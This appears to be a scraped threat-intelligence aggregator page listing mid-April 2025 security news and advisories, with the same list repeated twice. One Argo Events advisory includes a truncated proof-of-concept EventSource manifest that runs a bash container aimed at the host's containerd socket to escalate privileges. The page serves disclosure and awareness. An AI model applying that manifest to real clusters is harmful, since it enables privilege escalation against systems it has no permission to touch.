CyberAlerts

Description: DieNet Targeted the Website of Uber

Source: DarkWebInformer

April 14th, 2025 (8 days ago)

Chinese police ensnaring Tibetans over phone and internet activity, Human Rights Watch says

Description: Dozens of people in Tibet have been arrested by Chinese authorities in recent years for "simply using a cellphone," according to the nonprofit Human Rights Watch.

Source: The Record

April 14th, 2025 (8 days ago)

[github.com/argoproj/argo-events] Argo Events users can gain privileged access to the host system and cluster with EventSource and Sensor CR

Description: Summary: A user with permission to create/modify EventSource and Sensor custom resources can gain privileged access to the host system and cluster, even without having direct administrative privileges. Details: The EventSource and Sensor CRs allow the corresponding orchestrated pod to be customized with spec.template and spec.template.container (with type k8s.io/api/core/v1.Container), thus, any specification under container such as command, args, securityContext , volumeMount can be specified, and applied to the EventSource or Sensor pod due to the code logic below. if args.EventSource.Spec.Template != nil && args.EventSource.Spec.Template.Container != nil { if err := mergo.Merge(&eventSourceContainer, args.EventSource.Spec.Template.Container, mergo.WithOverride); err != nil { return nil, err } } With these, A user would be able to gain privileged access to the cluster host, if he/she specified the EventSource/Sensor CR with some particular properties under template. Here is an example that demonstrates the vulnerability. apiVersion: argoproj.io/v1alpha1 kind: EventSource metadata: name: poc-vulnerable-eventsource spec: webhook: security-test: port: "12000" endpoint: "/webhook" template: container: image: ubuntu:latest command: ["/bin/bash"] args: [ "-c", "apt-get update && apt-get install -y curl && while true; do rm -f /tmp/data; echo '=== containerd socket...

Source: Github Advisory Database (Go)

April 14th, 2025 (8 days ago)

[pleezer] Pleezer resource exhaustion through uncollected hook script processes

Description: Impact Hook scripts in pleezer can be triggered by various events like track changes and playback state changes. In affected versions, these scripts were spawned without proper process cleanup, leaving zombie processes in the system's process table. Even during normal usage, every track change and playback event would leave behind zombie processes. This leads to inevitable resource exhaustion over time as the system's process table fills up, eventually preventing new processes from being created. The issue is exacerbated if events occur rapidly, whether through normal use (e.g., skipping through a playlist) or potential manipulation of the Deezer Connect protocol traffic. This vulnerability affects all users who have configured hook scripts using the --hook option. Patches This issue has been fixed in version 0.16.0. Users should upgrade to this version, which properly manages child processes using asynchronous process handling and cleanup. Workarounds Users who cannot upgrade immediately can: Disable hook scripts by removing the --hook option Ensure hook scripts handle their own child process cleanup Regularly restart pleezer to clear accumulated zombie processes References Initial report: https://github.com/roderickvd/pleezer/discussions/83#discussioncomment-12818199 Fix commit: 436a5f1e4c08989b58dbba2b0ffa423458016c2d Fixed release: https://github.com/roderickvd/pleezer/releases/tag/v0.16.0 References https://github.com/roderickvd/pleezer/security/advisories/GHSA-4...

Source: Github Advisory Database (Rust)

April 14th, 2025 (8 days ago)

SSL/TLS certificate lifespans reduced to 47 days by 2029

Description: The CA/Browser Forum has voted to significantly reduce the lifespan of SSL/TLS certificates over the next 4 years, with a final lifespan of just 47 days starting in 2029. [...]

Source: BleepingComputer

April 14th, 2025 (8 days ago)

CVE-2025-29720

Dify v1.0 was discovered to contain a Server-Side Request Forgery (SSRF) via the component controllers.console.remote_files.RemoteFileUploadApi.

Description: Dify v1.0 was discovered to contain a Server-Side Request Forgery (SSRF) via the component controllers.console.remote_files.RemoteFileUploadApi.

EPSS Score: 0.01%

Source: CVE

April 14th, 2025 (8 days ago)

Fortinet Zero-Day Bug May Lead to Arbitrary Code Execution

🚨 Marked as known exploited on April 14th, 2025 (8 days ago).

Description: A threat actor posted about the zero-day exploit on the same day that Fortinet published a warning about known vulnerabilities under active exploitation.

Source: Dark Reading

April 14th, 2025 (8 days ago)

UK appoints security and intelligence specialist as ambassador to France

Description: Sir Thomas Drew — previously a top official in the Foreign Office and a key figure in Britain's response to Russia's invasion of Ukraine — will be the U.K.'s ambassador to France as the two countries prepare to work more closely on security issues.

Source: The Record

April 14th, 2025 (8 days ago)

Chinese APTs Exploit EDR 'Visibility Gap' for Cyber Espionage

Description: Blind spots in network visibility, including in firewalls, IoT devices, and the cloud, are being exploited by Chinese state-backed threat actors with increasing success, according to new threat intelligence. Here's how experts say you can get eyes on it all.

Source: Dark Reading

April 14th, 2025 (8 days ago)

New ResolverRAT malware targets pharma and healthcare orgs worldwide

Description: A new remote access trojan (RAT) called 'ResolverRAT' is being used against organizations globally, with the malware used in recent attacks targeting the healthcare and pharmaceutical sectors. [...]

Source: BleepingComputer

April 14th, 2025 (8 days ago)

Threat and Vulnerability Intelligence Database

Example Searches:

	DieNet Targeted the Website of Uber Description: DieNet Targeted the Website of Uber Source: DarkWebInformer April 14th, 2025 (8 days ago)
	Chinese police ensnaring Tibetans over phone and internet activity, Human Rights Watch says Description: Dozens of people in Tibet have been arrested by Chinese authorities in recent years for "simply using a cellphone," according to the nonprofit Human Rights Watch. Source: The Record April 14th, 2025 (8 days ago)
	[github.com/argoproj/argo-events] Argo Events users can gain privileged access to the host system and cluster with EventSource and Sensor CR Description: Summary: A user with permission to create/modify EventSource and Sensor custom resources can gain privileged access to the host system and cluster, even without having direct administrative privileges. Details: The EventSource and Sensor CRs allow the corresponding orchestrated pod to be customized with spec.template and spec.template.container (with type k8s.io/api/core/v1.Container), thus, any specification under container such as command, args, securityContext , volumeMount can be specified, and applied to the EventSource or Sensor pod due to the code logic below. if args.EventSource.Spec.Template != nil && args.EventSource.Spec.Template.Container != nil { if err := mergo.Merge(&eventSourceContainer, args.EventSource.Spec.Template.Container, mergo.WithOverride); err != nil { return nil, err } } With these, A user would be able to gain privileged access to the cluster host, if he/she specified the EventSource/Sensor CR with some particular properties under template. Here is an example that demonstrates the vulnerability. apiVersion: argoproj.io/v1alpha1 kind: EventSource metadata: name: poc-vulnerable-eventsource spec: webhook: security-test: port: "12000" endpoint: "/webhook" template: container: image: ubuntu:latest command: ["/bin/bash"] args: [ "-c", "apt-get update && apt-get install -y curl && while true; do rm -f /tmp/data; echo '=== containerd socket... Source: Github Advisory Database (Go) April 14th, 2025 (8 days ago)
	[pleezer] Pleezer resource exhaustion through uncollected hook script processes Description: Impact Hook scripts in pleezer can be triggered by various events like track changes and playback state changes. In affected versions, these scripts were spawned without proper process cleanup, leaving zombie processes in the system's process table. Even during normal usage, every track change and playback event would leave behind zombie processes. This leads to inevitable resource exhaustion over time as the system's process table fills up, eventually preventing new processes from being created. The issue is exacerbated if events occur rapidly, whether through normal use (e.g., skipping through a playlist) or potential manipulation of the Deezer Connect protocol traffic. This vulnerability affects all users who have configured hook scripts using the --hook option. Patches This issue has been fixed in version 0.16.0. Users should upgrade to this version, which properly manages child processes using asynchronous process handling and cleanup. Workarounds Users who cannot upgrade immediately can: Disable hook scripts by removing the --hook option Ensure hook scripts handle their own child process cleanup Regularly restart pleezer to clear accumulated zombie processes References Initial report: https://github.com/roderickvd/pleezer/discussions/83#discussioncomment-12818199 Fix commit: 436a5f1e4c08989b58dbba2b0ffa423458016c2d Fixed release: https://github.com/roderickvd/pleezer/releases/tag/v0.16.0 References https://github.com/roderickvd/pleezer/security/advisories/GHSA-4... Source: Github Advisory Database (Rust) April 14th, 2025 (8 days ago)
	SSL/TLS certificate lifespans reduced to 47 days by 2029 Description: The CA/Browser Forum has voted to significantly reduce the lifespan of SSL/TLS certificates over the next 4 years, with a final lifespan of just 47 days starting in 2029. [...] Source: BleepingComputer April 14th, 2025 (8 days ago)
CVE-2025-29720	Dify v1.0 was discovered to contain a Server-Side Request Forgery (SSRF) via the component controllers.console.remote_files.RemoteFileUploadApi. Description: Dify v1.0 was discovered to contain a Server-Side Request Forgery (SSRF) via the component controllers.console.remote_files.RemoteFileUploadApi. EPSS Score: 0.01% Source: CVE April 14th, 2025 (8 days ago)
	Fortinet Zero-Day Bug May Lead to Arbitrary Code Execution 🚨 Marked as known exploited on April 14th, 2025 (8 days ago). Description: A threat actor posted about the zero-day exploit on the same day that Fortinet published a warning about known vulnerabilities under active exploitation. Source: Dark Reading April 14th, 2025 (8 days ago)
	UK appoints security and intelligence specialist as ambassador to France Description: Sir Thomas Drew — previously a top official in the Foreign Office and a key figure in Britain's response to Russia's invasion of Ukraine — will be the U.K.'s ambassador to France as the two countries prepare to work more closely on security issues. Source: The Record April 14th, 2025 (8 days ago)
	Chinese APTs Exploit EDR 'Visibility Gap' for Cyber Espionage Description: Blind spots in network visibility, including in firewalls, IoT devices, and the cloud, are being exploited by Chinese state-backed threat actors with increasing success, according to new threat intelligence. Here's how experts say you can get eyes on it all. Source: Dark Reading April 14th, 2025 (8 days ago)
	New ResolverRAT malware targets pharma and healthcare orgs worldwide Description: A new remote access trojan (RAT) called 'ResolverRAT' is being used against organizations globally, with the malware used in recent attacks targeting the healthcare and pharmaceutical sectors. [...] Source: BleepingComputer April 14th, 2025 (8 days ago)